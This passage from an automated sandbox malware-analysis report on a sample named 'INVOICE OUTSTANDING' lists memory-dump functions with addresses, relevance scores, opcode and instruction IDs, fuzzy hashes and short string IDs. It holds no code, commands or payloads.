                                                                                                                          • Source File: 00000000.00000002.324618530.000000000140D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0140D000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_140d000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 35e90ea1cb6544ca5223f67d86710fd0bcf6f02b7d75b7b0b038a5b7a74a747e
                                                                                                                          • Instruction ID: 8ca80c5e364abb887b2715880decc727a27a169058f7eb51cca258be1ee2247e
                                                                                                                          • Opcode Fuzzy Hash: 35e90ea1cb6544ca5223f67d86710fd0bcf6f02b7d75b7b0b038a5b7a74a747e
                                                                                                                          • Instruction Fuzzy Hash: 9A118E75904280DFDB12CF94D5C4B16BB71FB84224F24C6AED8494B7A6C33AD85ACB51
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 013FD745 Relevance: .0, Instructions: 45COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.324453857.00000000013FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013FD000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_13fd000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 68e626977351561a7023bc975d98067800f8db0d7f1bc105d08ba63e35cbebd6
                                                                                                                          • Instruction ID: af5b55f5d301c6870dfd75b91a9ab02108679209b2204edeef8967c131d0a6d2
                                                                                                                          • Opcode Fuzzy Hash: 68e626977351561a7023bc975d98067800f8db0d7f1bc105d08ba63e35cbebd6
                                                                                                                          • Instruction Fuzzy Hash: 5501F7710043C49AE7119E56CD88B66BBACDF4122CF18C55EEB051FA87C3799848CAB1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 013FD744 Relevance: .0, Instructions: 36COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.324453857.00000000013FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013FD000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_13fd000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 81fe93f2b25d0d95584e059179e7a8b5b297123e3bef6e151406b8c9b24ed16b
                                                                                                                          • Instruction ID: 1225e649a474334703c5b73f823ef001c34f068e33cdcecdf949324cf3402a2c
                                                                                                                          • Opcode Fuzzy Hash: 81fe93f2b25d0d95584e059179e7a8b5b297123e3bef6e151406b8c9b24ed16b
                                                                                                                          • Instruction Fuzzy Hash: 3CF068714042849AE7119E15DCC8B62FFACDB41638F18C45AEE085F687C3799844CAB1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Non-executed Functions

                                                                                                                          Function 078B86B0 Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.351130975.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_78b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: "]X`$"]X`
                                                                                                                          • API String ID: 0-4180481408
                                                                                                                          • Opcode ID: 81ca2d2b06b3766b86e0dca7542ecf3dd8472e99bd958db74c7356e4f5b83e59
                                                                                                                          • Instruction ID: 5d083a4adf8ca517396d4a0ba691e332ae13cafbfd9f5678c68511ab52640116
                                                                                                                          • Opcode Fuzzy Hash: 81ca2d2b06b3766b86e0dca7542ecf3dd8472e99bd958db74c7356e4f5b83e59
                                                                                                                          • Instruction Fuzzy Hash: 0D7112B4E15219CFCB18CFA9C5805DEFBF6FB99214F24942AD415F7324D3349A428BA8
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 078BE360 Relevance: 2.6, Strings: 2, Instructions: 113COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.351130975.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_78b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: ^.}$^.}
                                                                                                                          • API String ID: 0-114468162
                                                                                                                          • Opcode ID: ef72bef9a4b8193c2bc2ab7bde92183f52c68a764d35c6d4ba2d57af246f67aa
                                                                                                                          • Instruction ID: 22e43552f74c6c323fa15b41be12f5a05191fd484b1af29b025afd450a207e05
                                                                                                                          • Opcode Fuzzy Hash: ef72bef9a4b8193c2bc2ab7bde92183f52c68a764d35c6d4ba2d57af246f67aa
                                                                                                                          • Instruction Fuzzy Hash: 7C4137B0E15219DFDB28CFAAD880BDEFBB2BB89204F14C1AAD508A7354DB3059458F54
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 078BD8B8 Relevance: 1.6, Strings: 1, Instructions: 334COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.351130975.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_78b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: D0k
                                                                                                                          • API String ID: 0-1329582393
                                                                                                                          • Opcode ID: 52c3a30d56ce010d45b8385838c6690e6303878c44cb1f1ed56a6421be4dcf95
                                                                                                                          • Instruction ID: 32e86279153c4d5643f1faf0bffed35252216ee4011eac4ffecc3ef28a7ee951
                                                                                                                          • Opcode Fuzzy Hash: 52c3a30d56ce010d45b8385838c6690e6303878c44cb1f1ed56a6421be4dcf95
                                                                                                                          • Instruction Fuzzy Hash: 43C1C2B1F0021AAFCF18DFB9C4516EEBBF2AF99318F149469D405E7354EB3499018BA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 078B86AB Relevance: 1.4, Strings: 1, Instructions: 168COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.351130975.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_78b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: "]X`
                                                                                                                          • API String ID: 0-1892397902
                                                                                                                          • Opcode ID: 3ee85d4d41d77432ebbb27fec4ede631c072609d83a255ad3eff935d731cb07a
                                                                                                                          • Instruction ID: 241c5006c4148faa9127dd0cb3eff7a4458cbb11969275f1551c13d90393dd00
                                                                                                                          • Opcode Fuzzy Hash: 3ee85d4d41d77432ebbb27fec4ede631c072609d83a255ad3eff935d731cb07a
                                                                                                                          • Instruction Fuzzy Hash: 1F6102B4E15209CFCB18CFA9C5805DEFBF6FB99214F24942AD415F7324D334AA418BA8
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 078B8480 Relevance: 1.4, Strings: 1, Instructions: 113COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.351130975.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_78b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: d!}
                                                                                                                          • API String ID: 0-3787972460
                                                                                                                          • Opcode ID: a49313e08ba30a162c97d654dddd60b924fdeb00ad8f8714c915525798d4fda3
                                                                                                                          • Instruction ID: 447ef8a2a6364f5a77b6a586daddfd6f6da39ad80d0da611b75b976cda5b20a9
                                                                                                                          • Opcode Fuzzy Hash: a49313e08ba30a162c97d654dddd60b924fdeb00ad8f8714c915525798d4fda3
                                                                                                                          • Instruction Fuzzy Hash: D64104B0E1521A8FCB58CFAAC4805EEFBF6AF99304F24C46AC515E7314E7349A418F94
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 078B8490 Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.351130975.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_78b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: d!}
                                                                                                                          • API String ID: 0-3787972460
                                                                                                                          • Opcode ID: ea8ac4d7f816c1da5122f9a783177aa89a61e9e720b25f5e3b22dc864ed5db95
                                                                                                                          • Instruction ID: 67d1e2810a00e12512137fae0bcb844a232626224dc73128a33466c8322db4e0
                                                                                                                          • Opcode Fuzzy Hash: ea8ac4d7f816c1da5122f9a783177aa89a61e9e720b25f5e3b22dc864ed5db95
                                                                                                                          • Instruction Fuzzy Hash: A241E1B0E1421A8FCB58CFAAC8815EEFBB6AB99304F24D46AC515F7314D7349A418F94
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 078BCB20 Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.351130975.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_78b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 1odv
                                                                                                                          • API String ID: 0-2460989039
                                                                                                                          • Opcode ID: 6920d9a2f150fcff4675d471c2ab7d4a1c77b9addeb6eb2b565d6dab9c56f444
                                                                                                                          • Instruction ID: 2d5af9f17825edee8b7cddc3c82b4c3a18f6d40324df36e08d02b774813ed145
                                                                                                                          • Opcode Fuzzy Hash: 6920d9a2f150fcff4675d471c2ab7d4a1c77b9addeb6eb2b565d6dab9c56f444
                                                                                                                          • Instruction Fuzzy Hash: 67313BB0E112198BDF28CF96D8807EEFBF2BB88200F14D0AAD558E7354DB305A418F61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 078B4450 Relevance: .3, Instructions: 339COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.351130975.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_78b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 6e765d3c701746ddc897f3d993dd4e0b1df7bc2f9f57bde8c0a527b318109fb5
                                                                                                                          • Instruction ID: 059144ae4566a8911b338efe242f39e2307efa98969f050bdfb7d813a532efd1
                                                                                                                          • Opcode Fuzzy Hash: 6e765d3c701746ddc897f3d993dd4e0b1df7bc2f9f57bde8c0a527b318109fb5
                                                                                                                          • Instruction Fuzzy Hash: DBE1AFB0D1525ACFCB10DFA8D891ADDBBB1FF55304F20856AD404EB796EB30990ACB91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 014BE820 Relevance: .3, Instructions: 315COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.326548559.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_14b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 4ecb158cdd0b931cd3b1415c179c3e657c38455c01b69a09dd6cd0baf42e867a
                                                                                                                          • Instruction ID: ac991d5c08ffb7d4defb8563a535f78a370cfab3ddeffdc38e47107eef522e00
                                                                                                                          • Opcode Fuzzy Hash: 4ecb158cdd0b931cd3b1415c179c3e657c38455c01b69a09dd6cd0baf42e867a
                                                                                                                          • Instruction Fuzzy Hash: 0912B4F14117468BE732CF65E9985893BB1B765328FB0420AD2612FAF9D7BC114ACF48
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 078B44D8 Relevance: .3, Instructions: 266COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.351130975.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_78b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b00af075dbf61e80c5ea7a5b5bc06a49e6471d008349b66a5b1cd9570923d3ec
                                                                                                                          • Instruction ID: ce8ae7676b3f5b100d4902552c29aa9a0659206e25dab3c375cffba70a3b7ccc
                                                                                                                          • Opcode Fuzzy Hash: b00af075dbf61e80c5ea7a5b5bc06a49e6471d008349b66a5b1cd9570923d3ec
                                                                                                                          • Instruction Fuzzy Hash: 86B160B4E1125ACFCB10DFA8D8819DEBBB2FF99304F208A69D405AB755DB309945CF90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 014BBF54 Relevance: .3, Instructions: 265COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.326548559.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_14b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: f71528834a1ca2b724c232f92659884af8be6b021a0a2c277a9f2187c15837e8
                                                                                                                          • Instruction ID: d384a89b7428caf6b9cb7dc328176b5788627f3cfdedeeb7016ab99ce4b276c7
                                                                                                                          • Opcode Fuzzy Hash: f71528834a1ca2b724c232f92659884af8be6b021a0a2c277a9f2187c15837e8
                                                                                                                          • Instruction Fuzzy Hash: 40A16B36E0061ACFCF15DFA5C8845DEBBB2FFD9304B15816AE905BB221EB31A945CB50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 078B4518 Relevance: .2, Instructions: 246COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.351130975.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_78b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: ac53ae0761907f590c924134ebe4a2210081a948436234e6f59ce7089ba7890f
                                                                                                                          • Instruction ID: 0a7e5c4272d2b907f99f19f43e65bc765860e13eb23ccc8312f6446150098dd0
                                                                                                                          • Opcode Fuzzy Hash: ac53ae0761907f590c924134ebe4a2210081a948436234e6f59ce7089ba7890f
                                                                                                                          • Instruction Fuzzy Hash: 64B12EB4E1121ADFCB54DFA9D8819DDBBB2FF89304F208929D505AB754DB30A945CF80
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 014BE810 Relevance: .2, Instructions: 223COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.326548559.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_14b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 738aeab6e5ba362d2b1cabd475bab65e08bda1e7bc318fbfd2c9b2f7c34181cc
                                                                                                                          • Instruction ID: ce6f564cb7278cf3932581747e8332d88e9fca2556c8faa52ecaf18b84b9ad29
                                                                                                                          • Opcode Fuzzy Hash: 738aeab6e5ba362d2b1cabd475bab65e08bda1e7bc318fbfd2c9b2f7c34181cc
                                                                                                                          • Instruction Fuzzy Hash: DDC12DF18117468BE722DF65E8881897B71BBA5328F70430AD1612FAF8D7BC154ACF58
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 078B72E9 Relevance: .2, Instructions: 197COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.351130975.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_78b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 6de3f3be4e7d0b15bf853eb4fdffa0d9a5b1876e57139c7bcd41e75b5631ef4f
                                                                                                                          • Instruction ID: e66367c2a0c491eef4a15a63fb563e5e48087004a56fdef468c7b6bb3370ce67
                                                                                                                          • Opcode Fuzzy Hash: 6de3f3be4e7d0b15bf853eb4fdffa0d9a5b1876e57139c7bcd41e75b5631ef4f
                                                                                                                          • Instruction Fuzzy Hash: 908102B4A1421A8FCB14CFA9C5809AEFBF1FF89310F54956AD415EB320D330AA06CF51
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 078B72F8 Relevance: .2, Instructions: 196COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.351130975.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_78b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: f739d293ae64a5541463e38edb4df542904e099b2ec46733a7aae828e8286851
                                                                                                                          • Instruction ID: 1824a8a1aa1dee266b913853a8ade15fe7fbe55c076b424a44e21e94da3cc283
                                                                                                                          • Opcode Fuzzy Hash: f739d293ae64a5541463e38edb4df542904e099b2ec46733a7aae828e8286851
                                                                                                                          • Instruction Fuzzy Hash: F691EFB4A1521A8FCB14CFA9C580A9EFBF1FF89314F54956AE415EB320D330AA46CF51
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 078BDAD8 Relevance: .2, Instructions: 168COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.351130975.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_78b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 0afd3bd0c1529c01de6d9fe43a40b2010c28decaf2112f682035afaa46d0be08
                                                                                                                          • Instruction ID: ab52dea7b271a1017bbb395d655b84ea3e54fa8318b89722ce96520eee83dd69
                                                                                                                          • Opcode Fuzzy Hash: 0afd3bd0c1529c01de6d9fe43a40b2010c28decaf2112f682035afaa46d0be08
                                                                                                                          • Instruction Fuzzy Hash: 96613AB1E1421AAFCB04CFAAC4419EEFBF2AF89314F14D425D515E7354D77499418FA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 078BDD90 Relevance: .1, Instructions: 118COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.351130975.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_78b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: e9743209a1bf8ef47a7583f4d305abd3084763afd31ea913806a8ee54fb57542
                                                                                                                          • Instruction ID: 81d2bbb155e4e3cc720dc05831b2ce17328f299d6bdbb54fec939998b7a715c8
                                                                                                                          • Opcode Fuzzy Hash: e9743209a1bf8ef47a7583f4d305abd3084763afd31ea913806a8ee54fb57542
                                                                                                                          • Instruction Fuzzy Hash: C8414CB0E152199BDB28CF9AD8806EEFBB2BB99310F14C16AD508F7354DB305A458F21
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 078B8938 Relevance: .1, Instructions: 110COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.351130975.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_78b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 15766c022f6dd7400d92f9a9f8ca58bba5ded47b5cadb1f50d561137de33d7ce
                                                                                                                          • Instruction ID: 28ae3c3cc903f036e4208d278c0c80e735b2cc4e1c1e4bb87a27a48b0219d28c
                                                                                                                          • Opcode Fuzzy Hash: 15766c022f6dd7400d92f9a9f8ca58bba5ded47b5cadb1f50d561137de33d7ce
                                                                                                                          • Instruction Fuzzy Hash: C24113B0E1420ADBCF04CFAAC9815DEFBB6BB89304F14C16AC405F7354D7349A028BA2
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 078B8948 Relevance: .1, Instructions: 104COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.351130975.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_78b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 164a71706b161c90c8cf8ac3c5ae3bd33423c00c5f97c9b95f78ac0a28de5fde
                                                                                                                          • Instruction ID: 678ed317a49f61a3bd68fc0fda8c1bc0143332f53792507cbd8b2d0fd3c6976b
                                                                                                                          • Opcode Fuzzy Hash: 164a71706b161c90c8cf8ac3c5ae3bd33423c00c5f97c9b95f78ac0a28de5fde
                                                                                                                          • Instruction Fuzzy Hash: 0141D2B1E1420ADBCF04CFAAC9815EEFBB6BB99304F14D16AC405F7344D7349A418BA6
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 078BC4D8 Relevance: .1, Instructions: 63COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.351130975.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_78b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 8c7f3f3d12aa1fe0ca0d458b192580481903cb10120bbc984bf3e3aefd79146d
                                                                                                                          • Instruction ID: 84f1800bde6c7a3af76ce3f69a11e48277b24171d08ba96c15dbfb602d1e4242
                                                                                                                          • Opcode Fuzzy Hash: 8c7f3f3d12aa1fe0ca0d458b192580481903cb10120bbc984bf3e3aefd79146d
                                                                                                                          • Instruction Fuzzy Hash: B62129B1E116298BDB18CFABD8416EEFBF7BFC8210F14C12AD518A7254DB304A018B61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 078B8B10 Relevance: .1, Instructions: 59COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.351130975.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_78b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: ff103c4087d75707b2546bbf788f3643ff999c62e0ee591d20767e6ece69cf52
                                                                                                                          • Instruction ID: 2cf3d81b3c4ca89e270b46fd6a3b5c08d9ddaee505ad5eeecb27fade850d93e9
                                                                                                                          • Opcode Fuzzy Hash: ff103c4087d75707b2546bbf788f3643ff999c62e0ee591d20767e6ece69cf52
                                                                                                                          • Instruction Fuzzy Hash: F511AAB1E156189BEB18CFABD8406DEFBF7AFC8210F04C17AC918A6214EB3415468F55
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 078B8B00 Relevance: .1, Instructions: 58COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.351130975.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_78b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: e3002ddb30e3f873b0ad3712e53e9be4a5b50baecd27c7ec131c09fbbfc7f428
                                                                                                                          • Instruction ID: 694e7232397a00d523700688914534df2f370b92984baf1a690a655dfc643da8
                                                                                                                          • Opcode Fuzzy Hash: e3002ddb30e3f873b0ad3712e53e9be4a5b50baecd27c7ec131c09fbbfc7f428
                                                                                                                          • Instruction Fuzzy Hash: 2111F1B1E106189BEB5CCF6BD8446DEFBF7AFC8200F04C07AC918A6255EB3455428F55
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 08324450 Relevance: .0, Instructions: 43COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.352700809.0000000008320000.00000040.00000800.00020000.00000000.sdmp, Offset: 08320000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_8320000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: a1719892c5258f8b31964670bfb8f4b2d1d8f2edf93d47bc677bef52814c2831
                                                                                                                          • Instruction ID: 45d2f85b35b4a8f94b6ef3266711d8abfbb86debff4e2eddb5e5408add0ee9b5
                                                                                                                          • Opcode Fuzzy Hash: a1719892c5258f8b31964670bfb8f4b2d1d8f2edf93d47bc677bef52814c2831
                                                                                                                          • Instruction Fuzzy Hash: 4F014B70D04268CFDB14CFA9C4587EEBBF1AF8D315F18906AD445B3290D7788984CB68
                                                                                                                          Uniqueness

